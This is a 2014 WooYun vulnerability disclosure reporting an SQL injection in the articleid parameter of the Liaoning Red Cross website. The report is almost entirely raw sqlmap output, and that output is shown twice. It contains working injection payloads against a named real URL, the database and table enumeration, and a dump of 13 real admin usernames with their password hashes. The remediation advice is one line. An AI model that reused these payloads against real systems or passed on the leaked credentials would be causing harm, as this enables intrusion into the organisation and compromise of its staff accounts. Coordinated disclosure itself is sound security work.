当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080132

漏洞标题:辽宁省红十字会存在sql注入漏洞

相关厂商:辽宁省红十字会

漏洞作者: Mr.Ghost

提交时间:2014-10-21 12:48

修复时间:2014-12-05 12:50

公开时间:2014-12-05 12:50

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-21: 细节已通知厂商并且等待厂商处理中
2014-10-25: 厂商已经确认,细节仅向厂商公开
2014-11-04: 细节向核心白帽子及相关领域专家公开
2014-11-14: 细节向普通白帽子公开
2014-11-24: 细节向实习白帽子公开
2014-12-05: 细节向公众公开

简要描述:

辽宁省红十字会官网存在sql注入漏洞,顺带求个码

详细说明:

www.lnredcross.org.cn/web/content.asp?id=46&articleid=1006
存在注入漏洞的参数为:articleid
直接跑程序

sqlmap identified the following injection points with a total of 19 HTTP(s) requ
ests:
---
Place: GET
Parameter: articleid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 9983=9983
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(
107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[14:56:14] [INFO] testing Microsoft SQL Server
[14:56:14] [INFO] confirming Microsoft SQL Server
[14:56:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[14:56:15] [INFO] fetching database names
[14:56:16] [INFO] the SQL query used returns 9 entries
[14:56:16] [INFO] retrieved: hongshiziyimai
[14:56:16] [INFO] retrieved: jijinhui
[14:56:17] [INFO] retrieved: lnredcross
[14:56:17] [INFO] retrieved: master
[14:56:20] [INFO] retrieved: model
[14:56:20] [INFO] retrieved: msdb
[14:56:20] [INFO] retrieved: Northwind
[14:56:24] [INFO] retrieved: pubs
[14:56:27] [INFO] retrieved: tempdb
available databases [9]:
[*] hongshiziyimai
[*] jijinhui
[*] lnredcross
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: articleid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 9983=9983
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(
107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[15:01:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:01:12] [INFO] fetching tables for database 'lnredcross'
[15:01:21] [INFO] the SQL query used returns 35 entries
[15:01:21] [INFO] retrieved: dbo.D99_Tmp
[15:01:22] [INFO] retrieved: dbo.dtproperties
[15:01:22] [INFO] retrieved: dbo.NC_Account
[15:01:22] [INFO] retrieved: dbo.NC_Adboard
[15:01:26] [INFO] retrieved: dbo.NC_AddMoney
[15:01:26] [INFO] retrieved: dbo.NC_Adlist
[15:01:26] [INFO] retrieved: dbo.NC_Admin
[15:01:27] [INFO] retrieved: dbo.NC_Announce
[15:01:27] [INFO] retrieved: dbo.NC_Article
[15:01:27] [INFO] retrieved: dbo.NC_Card
[15:01:28] [INFO] retrieved: dbo.NC_Channel
[15:01:30] [INFO] retrieved: dbo.NC_Classify
[15:01:30] [INFO] retrieved: dbo.NC_Comment
[15:01:30] [INFO] retrieved: dbo.NC_Config
[15:01:31] [INFO] retrieved: dbo.NC_Confirm
[15:01:31] [INFO] retrieved: dbo.NC_DownAddress
[15:01:31] [INFO] retrieved: dbo.NC_DownServer
[15:01:32] [INFO] retrieved: dbo.NC_Favorite
[15:01:32] [INFO] retrieved: dbo.NC_FlashList
[15:01:35] [INFO] retrieved: dbo.NC_Friend
[15:01:36] [INFO] retrieved: dbo.NC_GuestBook
[15:01:36] [INFO] retrieved: dbo.NC_GuestReply
[15:01:36] [INFO] retrieved: dbo.NC_Link
[15:01:37] [INFO] retrieved: dbo.NC_Message
[15:01:37] [INFO] retrieved: dbo.NC_Online
[15:01:37] [INFO] retrieved: dbo.NC_Paymode
[15:01:38] [INFO] retrieved: dbo.NC_ScriptFile
[15:01:38] [INFO] retrieved: dbo.NC_SoftList
[15:01:38] [INFO] retrieved: dbo.NC_Special
[15:01:39] [INFO] retrieved: dbo.NC_Template
[15:01:48] [INFO] retrieved: dbo.NC_User
[15:01:48] [INFO] retrieved: dbo.NC_UserGroup
[15:01:48] [INFO] retrieved: dbo.NC_Vote
[15:01:49] [INFO] retrieved: dbo.sysconstraints
[15:01:53] [INFO] retrieved: dbo.syssegments
Database: lnredcross
[35 tables]
+--------------------+
| dbo.D99_Tmp        |
| dbo.NC_Account     |
| dbo.NC_Adboard     |
| dbo.NC_AddMoney    |
| dbo.NC_Adlist      |
| dbo.NC_Admin       |
| dbo.NC_Announce    |
| dbo.NC_Article     |
| dbo.NC_Card        |
| dbo.NC_Channel     |
| dbo.NC_Classify    |
| dbo.NC_Comment     |
| dbo.NC_Config      |
| dbo.NC_Confirm     |
| dbo.NC_DownAddress |
| dbo.NC_DownServer  |
| dbo.NC_Favorite    |
| dbo.NC_FlashList   |
| dbo.NC_Friend      |
| dbo.NC_GuestBook   |
| dbo.NC_GuestReply  |
| dbo.NC_Link        |
| dbo.NC_Message     |
| dbo.NC_Online      |
| dbo.NC_Paymode     |
| dbo.NC_ScriptFile  |
| dbo.NC_SoftList    |
| dbo.NC_Special     |
| dbo.NC_Template    |
| dbo.NC_User        |
| dbo.NC_UserGroup   |
| dbo.NC_Vote        |
| dbo.dtproperties   |
| dbo.sysconstraints |
| dbo.syssegments    |
+--------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: articleid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 9983=9983
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(
107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[15:05:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:05:00] [INFO] fetching columns for table 'dbo.NC_Admin' on database 'lnredcr
oss'
[15:05:01] [INFO] the SQL query used returns 11 entries
[15:05:01] [INFO] retrieved: Adminflag
[15:05:03] [INFO] retrieved: int
[15:05:03] [INFO] retrieved: AdminGrade
[15:05:04] [INFO] retrieved: int
[15:05:04] [INFO] retrieved: id
[15:05:04] [INFO] retrieved: int
[15:05:05] [INFO] retrieved: isAloneLogin
[15:05:05] [INFO] retrieved: nvarchar
[15:05:05] [INFO] retrieved: isLock
[15:05:06] [INFO] retrieved: nvarchar
[15:05:06] [INFO] retrieved: Loginip
[15:05:06] [INFO] retrieved: nvarchar
[15:05:07] [INFO] retrieved: LoginTime
[15:05:07] [INFO] retrieved: nvarchar
[15:05:07] [INFO] retrieved: password
[15:05:12] [INFO] retrieved: nvarchar
[15:05:13] [INFO] retrieved: RandomCode
[15:05:13] [INFO] retrieved: nvarchar
[15:05:15] [INFO] retrieved: status
[15:05:16] [INFO] retrieved: nvarchar
[15:05:16] [INFO] retrieved: username
[15:05:16] [INFO] retrieved: nvarchar
Database: lnredcross
Table: dbo.NC_Admin
[11 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| Adminflag    | int      |
| AdminGrade   | int      |
| id           | int      |
| isAloneLogin | nvarchar |
| isLock       | nvarchar |
| Loginip      | nvarchar |
| LoginTime    | nvarchar |
| password     | nvarchar |
| RandomCode   | nvarchar |
| status       | nvarchar |
| username     | nvarchar |
+--------------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: articleid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 9983=9983
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(
107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[15:06:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:06:59] [INFO] fetching columns 'username, password' entries for table 'dbo.N
C_Admin' on database 'lnredcross'
[15:06:59] [INFO] retrieved: 13
[15:06:59] [INFO] fetching number of distinct values for column 'username'
[15:07:00] [INFO] retrieved: 13
[15:07:00] [INFO] using column 'username' as a pivot for retrieving row data
[15:07:00] [INFO] retrieved: 123
[15:07:01] [INFO] retrieved: ac59075b964b0715
[15:07:01] [INFO] retrieved: admin
[15:07:02] [INFO] retrieved: 06536de9f5104260
[15:07:02] [INFO] retrieved: asd
[15:07:02] [INFO] retrieved: f44f4964e6c998de
[15:07:02] [INFO] retrieved: bangongshi
[15:07:39] [INFO] retrieved: 965eb72c92a549dd
[15:07:39] [INFO] retrieved: dingdong
[15:07:49] [INFO] retrieved: 8ad9902aecba32e2
[15:07:49] [INFO] retrieved: ganxibao
[15:07:49] [INFO] retrieved: 2e2594b46e526824
[15:07:50] [INFO] retrieved: gwh
[15:07:50] [INFO] retrieved: 9443e0d88214175f
[15:08:11] [INFO] retrieved: machi
[15:08:11] [INFO] retrieved: 2b0f6f5eae91475d
[15:08:18] [INFO] retrieved: neibuzhuanlan
[15:08:20] [INFO] retrieved: d12b9eccf90f9873
[15:08:20] [INFO] retrieved: rctest
[15:08:21] [INFO] retrieved: aa4949bf181436f2
[15:08:21] [INFO] retrieved: xiangmuban
[15:08:21] [INFO] retrieved: 197cca949bdb9c6d
[15:08:25] [INFO] retrieved: zhenjibu
[15:08:25] [INFO] retrieved: e69785d9338da63f
[15:08:25] [INFO] retrieved: zuxuanbu
[15:08:26] [INFO] retrieved: 965eb72c92a549dd
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] N
Database: lnredcross
Table: dbo.NC_Admin
[13 entries]
+------------------+---------------+
| password         | username      |
+------------------+---------------+
| ac59075b964b0715 | 123           |
| 06536de9f5104260 | admin         |
| f44f4964e6c998de | asd           |
| 965eb72c92a549dd | bangongshi    |
| 8ad9902aecba32e2 | dingdong      |
| 2e2594b46e526824 | ganxibao      |
| 9443e0d88214175f | gwh           |
| 2b0f6f5eae91475d | machi         |
| d12b9eccf90f9873 | neibuzhuanlan |
| aa4949bf181436f2 | rctest        |
| 197cca949bdb9c6d | xiangmuban    |
| e69785d9338da63f | zhenjibu      |
| 965eb72c92a549dd | zuxuanbu      |
+------------------+---------------+

漏洞证明:

sqlmap identified the following injection points with a total of 19 HTTP(s) requ
ests:
---
Place: GET
Parameter: articleid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 9983=9983
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(
107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[14:56:14] [INFO] testing Microsoft SQL Server
[14:56:14] [INFO] confirming Microsoft SQL Server
[14:56:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[14:56:15] [INFO] fetching database names
[14:56:16] [INFO] the SQL query used returns 9 entries
[14:56:16] [INFO] retrieved: hongshiziyimai
[14:56:16] [INFO] retrieved: jijinhui
[14:56:17] [INFO] retrieved: lnredcross
[14:56:17] [INFO] retrieved: master
[14:56:20] [INFO] retrieved: model
[14:56:20] [INFO] retrieved: msdb
[14:56:20] [INFO] retrieved: Northwind
[14:56:24] [INFO] retrieved: pubs
[14:56:27] [INFO] retrieved: tempdb
available databases [9]:
[*] hongshiziyimai
[*] jijinhui
[*] lnredcross
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: articleid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 9983=9983
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(
107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[15:01:12] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:01:12] [INFO] fetching tables for database 'lnredcross'
[15:01:21] [INFO] the SQL query used returns 35 entries
[15:01:21] [INFO] retrieved: dbo.D99_Tmp
[15:01:22] [INFO] retrieved: dbo.dtproperties
[15:01:22] [INFO] retrieved: dbo.NC_Account
[15:01:22] [INFO] retrieved: dbo.NC_Adboard
[15:01:26] [INFO] retrieved: dbo.NC_AddMoney
[15:01:26] [INFO] retrieved: dbo.NC_Adlist
[15:01:26] [INFO] retrieved: dbo.NC_Admin
[15:01:27] [INFO] retrieved: dbo.NC_Announce
[15:01:27] [INFO] retrieved: dbo.NC_Article
[15:01:27] [INFO] retrieved: dbo.NC_Card
[15:01:28] [INFO] retrieved: dbo.NC_Channel
[15:01:30] [INFO] retrieved: dbo.NC_Classify
[15:01:30] [INFO] retrieved: dbo.NC_Comment
[15:01:30] [INFO] retrieved: dbo.NC_Config
[15:01:31] [INFO] retrieved: dbo.NC_Confirm
[15:01:31] [INFO] retrieved: dbo.NC_DownAddress
[15:01:31] [INFO] retrieved: dbo.NC_DownServer
[15:01:32] [INFO] retrieved: dbo.NC_Favorite
[15:01:32] [INFO] retrieved: dbo.NC_FlashList
[15:01:35] [INFO] retrieved: dbo.NC_Friend
[15:01:36] [INFO] retrieved: dbo.NC_GuestBook
[15:01:36] [INFO] retrieved: dbo.NC_GuestReply
[15:01:36] [INFO] retrieved: dbo.NC_Link
[15:01:37] [INFO] retrieved: dbo.NC_Message
[15:01:37] [INFO] retrieved: dbo.NC_Online
[15:01:37] [INFO] retrieved: dbo.NC_Paymode
[15:01:38] [INFO] retrieved: dbo.NC_ScriptFile
[15:01:38] [INFO] retrieved: dbo.NC_SoftList
[15:01:38] [INFO] retrieved: dbo.NC_Special
[15:01:39] [INFO] retrieved: dbo.NC_Template
[15:01:48] [INFO] retrieved: dbo.NC_User
[15:01:48] [INFO] retrieved: dbo.NC_UserGroup
[15:01:48] [INFO] retrieved: dbo.NC_Vote
[15:01:49] [INFO] retrieved: dbo.sysconstraints
[15:01:53] [INFO] retrieved: dbo.syssegments
Database: lnredcross
[35 tables]
+--------------------+
| dbo.D99_Tmp        |
| dbo.NC_Account     |
| dbo.NC_Adboard     |
| dbo.NC_AddMoney    |
| dbo.NC_Adlist      |
| dbo.NC_Admin       |
| dbo.NC_Announce    |
| dbo.NC_Article     |
| dbo.NC_Card        |
| dbo.NC_Channel     |
| dbo.NC_Classify    |
| dbo.NC_Comment     |
| dbo.NC_Config      |
| dbo.NC_Confirm     |
| dbo.NC_DownAddress |
| dbo.NC_DownServer  |
| dbo.NC_Favorite    |
| dbo.NC_FlashList   |
| dbo.NC_Friend      |
| dbo.NC_GuestBook   |
| dbo.NC_GuestReply  |
| dbo.NC_Link        |
| dbo.NC_Message     |
| dbo.NC_Online      |
| dbo.NC_Paymode     |
| dbo.NC_ScriptFile  |
| dbo.NC_SoftList    |
| dbo.NC_Special     |
| dbo.NC_Template    |
| dbo.NC_User        |
| dbo.NC_UserGroup   |
| dbo.NC_Vote        |
| dbo.dtproperties   |
| dbo.sysconstraints |
| dbo.syssegments    |
+--------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: articleid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 9983=9983
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(
107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[15:05:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:05:00] [INFO] fetching columns for table 'dbo.NC_Admin' on database 'lnredcr
oss'
[15:05:01] [INFO] the SQL query used returns 11 entries
[15:05:01] [INFO] retrieved: Adminflag
[15:05:03] [INFO] retrieved: int
[15:05:03] [INFO] retrieved: AdminGrade
[15:05:04] [INFO] retrieved: int
[15:05:04] [INFO] retrieved: id
[15:05:04] [INFO] retrieved: int
[15:05:05] [INFO] retrieved: isAloneLogin
[15:05:05] [INFO] retrieved: nvarchar
[15:05:05] [INFO] retrieved: isLock
[15:05:06] [INFO] retrieved: nvarchar
[15:05:06] [INFO] retrieved: Loginip
[15:05:06] [INFO] retrieved: nvarchar
[15:05:07] [INFO] retrieved: LoginTime
[15:05:07] [INFO] retrieved: nvarchar
[15:05:07] [INFO] retrieved: password
[15:05:12] [INFO] retrieved: nvarchar
[15:05:13] [INFO] retrieved: RandomCode
[15:05:13] [INFO] retrieved: nvarchar
[15:05:15] [INFO] retrieved: status
[15:05:16] [INFO] retrieved: nvarchar
[15:05:16] [INFO] retrieved: username
[15:05:16] [INFO] retrieved: nvarchar
Database: lnredcross
Table: dbo.NC_Admin
[11 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| Adminflag    | int      |
| AdminGrade   | int      |
| id           | int      |
| isAloneLogin | nvarchar |
| isLock       | nvarchar |
| Loginip      | nvarchar |
| LoginTime    | nvarchar |
| password     | nvarchar |
| RandomCode   | nvarchar |
| status       | nvarchar |
| username     | nvarchar |
+--------------+----------+
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: articleid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 9983=9983
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=46&articleid=1006 AND 8171=CONVERT(INT,(CHAR(58)+CHAR(105)+CHAR(
107)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (8171=8171) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(58)+CHAR(105)+CHAR(107)+CHAR(101)+CHAR(58)))
---
[15:06:59] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[15:06:59] [INFO] fetching columns 'username, password' entries for table 'dbo.N
C_Admin' on database 'lnredcross'
[15:06:59] [INFO] retrieved: 13
[15:06:59] [INFO] fetching number of distinct values for column 'username'
[15:07:00] [INFO] retrieved: 13
[15:07:00] [INFO] using column 'username' as a pivot for retrieving row data
[15:07:00] [INFO] retrieved: 123
[15:07:01] [INFO] retrieved: ac59075b964b0715
[15:07:01] [INFO] retrieved: admin
[15:07:02] [INFO] retrieved: 06536de9f5104260
[15:07:02] [INFO] retrieved: asd
[15:07:02] [INFO] retrieved: f44f4964e6c998de
[15:07:02] [INFO] retrieved: bangongshi
[15:07:39] [INFO] retrieved: 965eb72c92a549dd
[15:07:39] [INFO] retrieved: dingdong
[15:07:49] [INFO] retrieved: 8ad9902aecba32e2
[15:07:49] [INFO] retrieved: ganxibao
[15:07:49] [INFO] retrieved: 2e2594b46e526824
[15:07:50] [INFO] retrieved: gwh
[15:07:50] [INFO] retrieved: 9443e0d88214175f
[15:08:11] [INFO] retrieved: machi
[15:08:11] [INFO] retrieved: 2b0f6f5eae91475d
[15:08:18] [INFO] retrieved: neibuzhuanlan
[15:08:20] [INFO] retrieved: d12b9eccf90f9873
[15:08:20] [INFO] retrieved: rctest
[15:08:21] [INFO] retrieved: aa4949bf181436f2
[15:08:21] [INFO] retrieved: xiangmuban
[15:08:21] [INFO] retrieved: 197cca949bdb9c6d
[15:08:25] [INFO] retrieved: zhenjibu
[15:08:25] [INFO] retrieved: e69785d9338da63f
[15:08:25] [INFO] retrieved: zuxuanbu
[15:08:26] [INFO] retrieved: 965eb72c92a549dd
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] N
Database: lnredcross
Table: dbo.NC_Admin
[13 entries]
+------------------+---------------+
| password         | username      |
+------------------+---------------+
| ac59075b964b0715 | 123           |
| 06536de9f5104260 | admin         |
| f44f4964e6c998de | asd           |
| 965eb72c92a549dd | bangongshi    |
| 8ad9902aecba32e2 | dingdong      |
| 2e2594b46e526824 | ganxibao      |
| 9443e0d88214175f | gwh           |
| 2b0f6f5eae91475d | machi         |
| d12b9eccf90f9873 | neibuzhuanlan |
| aa4949bf181436f2 | rctest        |
| 197cca949bdb9c6d | xiangmuban    |
| e69785d9338da63f | zhenjibu      |
| 965eb72c92a549dd | zuxuanbu      |
+------------------+---------------+

修复方案:

加强过滤吧

版权声明:转载请注明来源 Mr.Ghost@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-10-25 23:44

厂商回复:

最新状态:

暂无

漏洞评价:

评论